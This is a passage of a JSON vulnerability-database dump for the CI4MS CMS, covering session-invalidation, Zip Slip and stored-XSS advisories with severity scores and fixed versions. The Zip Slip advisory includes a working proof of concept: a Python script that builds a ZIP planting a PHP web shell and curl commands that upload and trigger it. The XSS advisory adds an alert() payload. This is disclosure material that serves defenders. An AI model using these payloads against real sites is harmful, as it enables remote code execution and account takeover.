                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-8rh5-4mvx-xj7j",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T20:29:33Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-8rh5-4mvx-xj7j"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39393",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39393"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-8rh5-4mvx-xj7j",
                    "reference_id": "GHSA-8rh5-4mvx-xj7j",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-8rh5-4mvx-xj7j"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1015581?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-cd9w-5f22-xkfk"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110229?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-39393",
                "GHSA-8rh5-4mvx-xj7j"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-e9xp-rar3-c7bp"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89457?format=api",
            "vulnerability_id": "VCID-g79q-pkjw-2ydw",
            "summary": "CI4MS: Account Deactivation Module Grants Full Persistent Unauthorized Access for All‑Roles via Improper Session Invalidation (Logic Flaw)\n## Summary\n### Vulnerability: Improper Session Invalidation on Account Deactivation (Broken Access Control / Logic Flaw)\n- This vulnerability is caused by a backend logic flaw that maintains a false trust assumption that already-authenticated users remain trustworthy, even after their accounts are explicitly deactivated. As a result, administrative security actions do not behave as intended, allowing persistent unauthorized access.\n\n### Description\nThe application fails to immediately revoke active user sessions when an account is deactivated. Due to a logic flaw in the backend design, account state changes are enforced only during authentication (login), not for already-established sessions.\n\nThe system implicitly assumes that authenticated users remain trusted for the lifetime of their session. There is no session expiration or account expiration mechanism in place, causing deactivated accounts to retain indefinite access until the user manually logs out. This behavior breaks the intended access control policy and results in persistent unauthorized access, representing a critical security flaw.\n\n### Affected Functionality\n- User session management and authentication logic\n- Account deactivation mechanism\n- All authenticated endpoints, including administrative and content interfaces\n\n### Attack Scenario\n- A user logs into the application.\n- An administrator deactivates the user account.\n- The user remains fully logged in and can continue performing all actions allowed by their role indefinitely, as there is no session expiration.\n- The user can continue invoking backend methods, triggering application actions, accessing sensitive interfaces (including user management if permitted), and interacting with the system as if the account were still active.\n- Access is only lost if the user manually logs out, which may never occur.\n\n### Impact\n- Unauthorized Continued Access: Deactivated users retain full access indefinitely, violating intended access control and expected security behavior.\n- Bypass of Administrative Controls: Administrative actions (deactivation) fail to immediately restrict active sessions.\n- Logic Flaw Resulting in Broken Behavior: Backend authorization logic relies on a flawed trust assumption that authenticated users remain valid, enforcing account state only at login.\n- Full Functional Access Retained: Deactivated users can continue invoking application methods, executing actions, interacting with protected endpoints, and using the system exactly as before being deactivated.\n- Privilege Abuse: Users with elevated roles (moderator, editor, administrator) can continue performing privileged actions after account deactivation, including accessing user management interfaces and modifying application state.\n- Service Disruption Potential: Persistent access allows attackers to disrupt services, manipulate content, or interfere with normal application operations.\n- Attack Persistence: Attackers can maintain access indefinitely, increasing the risk of data exfiltration, unauthorized modifications, or further privilege escalation.\n- False Sense of Remediation: Administrators may believe a threat has been mitigated while the deactivated user remains active within the system.\n\nEndpoint Example: Any endpoint accessible to authenticated users, including dashboards, administrative interfaces, user management pages, and API endpoints.\n\n## Steps To Reproduce (PoC)\n1. Create or use an existing user account.\n2. Log into the application using this account.\n3. From an administrative account, deactivate the logged-in user account.\n4. Observe that the target user remains authenticated.\n5. Verify that the user can still access protected functionality, invoke actions, and interact with the application as before.\n6. Confirm that the user only loses access after manually logging out (if they choose to do so).\n\n## Remediation\n- Immediately invalidate all active sessions when an account is deactivated.\n- Enforce account status checks on every authenticated request, not only during login.\n- Introduce proper session expiration or account expiration mechanisms to prevent indefinite access.\n- Correct the backend logic flaw to ensure access control behavior aligns with intended security design and does not rely on unsafe trust assumptions.\n\n# Ready Video POC:\nhttps://mega.nz/file/zJkhwCII#G1-TecKmNBJmEeBS0ExsAY_RXEmAl3QqMqu4t5oy844",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34572",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00035",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10889",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00035",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10843",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00035",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10879",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00041",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12843",
                            "published_at": "2026-06-08T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34572"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T13:51:06Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-8fq3-c5w3-pj3q",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-02T13:51:06Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-8fq3-c5w3-pj3q"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34572",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34572"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-8fq3-c5w3-pj3q",
                    "reference_id": "GHSA-8fq3-c5w3-pj3q",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-8fq3-c5w3-pj3q"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1126144?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2v9s-x9dt-8ugb"
                        },
                        {
                            "vulnerability": "VCID-6nzs-j8gz-9ucu"
                        },
                        {
                            "vulnerability": "VCID-8x3z-1p5j-6qfa"
                        },
                        {
                            "vulnerability": "VCID-c1ux-y4qk-xfch"
                        },
                        {
                            "vulnerability": "VCID-e9xp-rar3-c7bp"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-p1q2-w18a-3kae"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        },
                        {
                            "vulnerability": "VCID-w12h-33nr-bufh"
                        },
                        {
                            "vulnerability": "VCID-ye3h-3tu7-p3e7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-34572",
                "GHSA-8fq3-c5w3-pj3q"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g79q-pkjw-2ydw"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89990?format=api",
            "vulnerability_id": "VCID-j32w-tcpz-1fak",
            "summary": "CI4MS Backup::restore is vulnerable to Zip Slip leading to RCE\n### Summary\nci4ms Backup::restore extracts user uploaded ZIP archives without validating entry names, allowing an authenticated backend user with the backup create permission to write files to arbitrary filesystem locations (Zip Slip) and achieve remote code execution by dropping a PHP file under the public web root.\n\n### Details\nmodules/Backup/Controllers/Backup.php:80-119 implements the restore action. The uploaded file is moved to `WRITEPATH . 'uploads/'`, and if the extension is `zip`, ZipArchive::extractTo() is called directly without iterating entries to verify they resolve inside the destination:\n\n```php\npublic function restore()\n{\n    $valData = ([\n        'backup_file' => ['label' => 'Backup File', 'rules' => 'uploaded[backup_file]|ext_in[backup_file,zip]'],\n    ]);\n    if ($this->validate($valData) == false) return redirect()->route('backup')->withInput()->with('errors', $this->validator->getErrors());\n    $file = $this->request->getFile('backup_file');\n\n    if ($file && $file->isValid() && ! $file->hasMoved()) {\n        $newName    = $file->getRandomName();\n        $uploadPath = WRITEPATH . 'uploads/';\n        ...\n        $filePath = WRITEPATH . 'uploads/' . $newName;\n        $sqlPath  = $filePath;\n        if ($ext === 'zip') {\n            $zip = new \\ZipArchive();\n            if ($zip->open($filePath) === true) {\n                $zip->extractTo($uploadPath);          // no entry-name validation\n                $sqlPath = $uploadPath . $zip->getNameIndex(0);\n                $zip->close();\n                @unlink($filePath);\n            }\n        }\n        ...\n    }\n}\n```\n\nA ZIP containing entries like `../../public/shell.php` is extracted outside `writable/uploads/` into directories served by PHP. The author validates entries correctly in modules/Methods/Controllers/Methods.php:165-175 with a realpath + regex loop; the same check is missing here.\n\nRouting: modules/Backup/Config/Routes.php binds `POST backend/backup/restore` to Backup::restore with `role=create`, and modules/Backup/Config/BackupConfig.php adds `backend/backup` and `backend/backup/*` to `csrfExcept`, so the route accepts cross-site POSTs from an authenticated administrator's browser.\n\n### PoC\nBuild the archive:\n\n```python\npython3 -c \"\nimport zipfile\nwith zipfile.ZipFile('evil.zip','w') as z:\n    z.writestr('../../public/shell.php', '<?php system(\\$_GET[\\\"c\\\"]); ?>')\n    z.writestr('dump.sql', 'SELECT 1;')\n\"\n```\n\nSubmit it as a backup to restore:\n\n```bash\ncurl -i -b 'ci4ms_session=<SESSION_ID>' \\\n  -F 'backup_file=@evil.zip' \\\n  https://target.example.com/backend/backup/restore\n```\n\nTrigger the shell:\n\n```bash\ncurl 'https://target.example.com/shell.php?c=id'\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\n### Impact\nAny ci4ms account that can restore a backup can write arbitrary files under the application root and gain remote code execution on the server, fully compromising the installation, the database credentials stored in .env, and any content the site handles. Because the route is in the csrfExcept list, a logged-in administrator who visits a malicious page can be forced to perform the restore cross-site, turning this into drive-by RCE against site operators.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41202",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00464",
                            "scoring_system": "epss",
                            "scoring_elements": "0.64694",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00464",
                            "scoring_system": "epss",
                            "scoring_elements": "0.64693",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00464",
                            "scoring_system": "epss",
                            "scoring_elements": "0.64703",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00534",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67775",
                            "published_at": "2026-06-08T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41202"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-07T12:39:58Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-xp9f-pvvc-57p4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-07T12:39:58Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-xp9f-pvvc-57p4"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41202",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41202"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-xp9f-pvvc-57p4",
                    "reference_id": "GHSA-xp9f-pvvc-57p4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-xp9f-pvvc-57p4"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1126288?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.5",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.5"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1041566?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.5.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-cd9w-5f22-xkfk"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.5.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110106?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.5%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.5%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-41202",
                "GHSA-xp9f-pvvc-57p4"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-j32w-tcpz-1fak"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89838?format=api",
            "vulnerability_id": "VCID-j76j-w4bk-nuft",
            "summary": "CI4MS: Pages Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM XSS via Page Management Fields (Persistent Payload Injection)**\n- Stored Cross-Site Scripting via Unsanitized Page Creation and Editing Inputs\n\n### Description\nThe application fails to properly sanitize user-controlled input within the **Page Management** functionality when creating or editing pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side.\n\nThese stored values are later rendered without proper output encoding across administrative page lists and public-facing page views, leading to stored DOM-based cross-site scripting (XSS).\n\n### Affected Functionality\n- Page creation functionality\n- Page editing functionality\n- Page list and management views\n- Public-facing page rendering\n- Storage and retrieval of page-related data\n\n### Affected Fields\n- Title\n- URL\n- Content\n- Cover Image\n- Image URL\n- Image Width\n- Image Height\n- SEO Description\n- SEO Keywords\n\n### Attack Scenario\n- An attacker creates or edits a page and injects a malicious XSS payload into one or more page-related input fields.\n- The application stores these values without sanitization or encoding.\n- The payload is rendered in administrative page lists and public-facing page views.\n- The payload executes automatically in the browser context of administrators, authenticated users, and unauthenticated visitors.\n\n### Impact\n- Persistent Stored XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Privilege escalation when viewed by administrators or privileged users\n- Full administrator account takeover\n- Full account takeover across all roles\n- Full compromise of the entire application\n\nEndpoints:\n- `/backend/pages/create`\n- Page list management view\n- Public-facing page views\n\n## Steps To Reproduce (POC)\n1. Navigate to the Page Management -> Add Page interface\n2. Insert an XSS payload into any page-related field such as:\n`<img src=x onerror=alert(document.domain)>`\n3. Save or publish the page\n4. View the page via the administrative page list or public-facing page\n5. Observe the XSS payload executing automatically\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n  - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n  - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n  - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n  - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n  These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n\n# Ready Video POC:\nhttps://mega.nz/file/iAkWAKQY#hCUv4DlMPFykPvb4gO94ZVGj64tpUk99gLxE6u1kASk",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34566",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15923",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15872",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15912",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00058",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18292",
                            "published_at": "2026-06-08T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34566"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-04T03:15:25Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-458r-h248-29c5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-04T03:15:25Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-458r-h248-29c5"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34566",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34566"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-458r-h248-29c5",
                    "reference_id": "GHSA-458r-h248-29c5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-458r-h248-29c5"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2v9s-x9dt-8ugb"
                        },
                        {
                            "vulnerability": "VCID-6nzs-j8gz-9ucu"
                        },
                        {
                            "vulnerability": "VCID-8x3z-1p5j-6qfa"
                        },
                        {
                            "vulnerability": "VCID-c1ux-y4qk-xfch"
                        },
                        {
                            "vulnerability": "VCID-e9xp-rar3-c7bp"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-p1q2-w18a-3kae"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        },
                        {
                            "vulnerability": "VCID-w12h-33nr-bufh"
                        },
                        {
                            "vulnerability": "VCID-ye3h-3tu7-p3e7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
